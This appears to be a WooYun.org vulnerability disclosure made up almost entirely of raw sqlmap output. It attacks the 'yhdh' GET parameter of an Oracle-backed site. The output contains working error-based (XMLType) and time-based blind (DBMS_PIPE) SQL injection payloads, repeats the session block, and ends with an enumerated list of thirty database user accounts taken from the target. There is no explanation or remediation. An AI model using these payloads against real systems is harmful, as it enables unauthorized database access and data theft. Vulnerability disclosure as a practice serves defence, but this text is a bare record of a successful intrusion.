WooYun.org

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: yhdh (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: type=jdcwfts&yhdh=3066BVXW' AND 8911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8911=8911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'rpmY'='rpmY
    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: type=jdcwfts&yhdh=3066BVXW' OR 4382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(90)||CHR(112)||CHR(75),5) AND 'bEMX'='bEMX
---
back-end DBMS: Oracle
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: yhdh (GET)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: type=jdcwfts&yhdh=3066BVXW' AND 8911=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8911=8911) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'rpmY'='rpmY
    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: type=jdcwfts&yhdh=3066BVXW' OR 4382=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(90)||CHR(112)||CHR(75),5) AND 'bEMX'='bEMX
---
back-end DBMS: Oracle
database management system users [30]:
[*] ANONYMOUS
[*] BI
[*] CTXSYS
[*] CX_DXGZ
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QDLP_USER
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZDCL_USER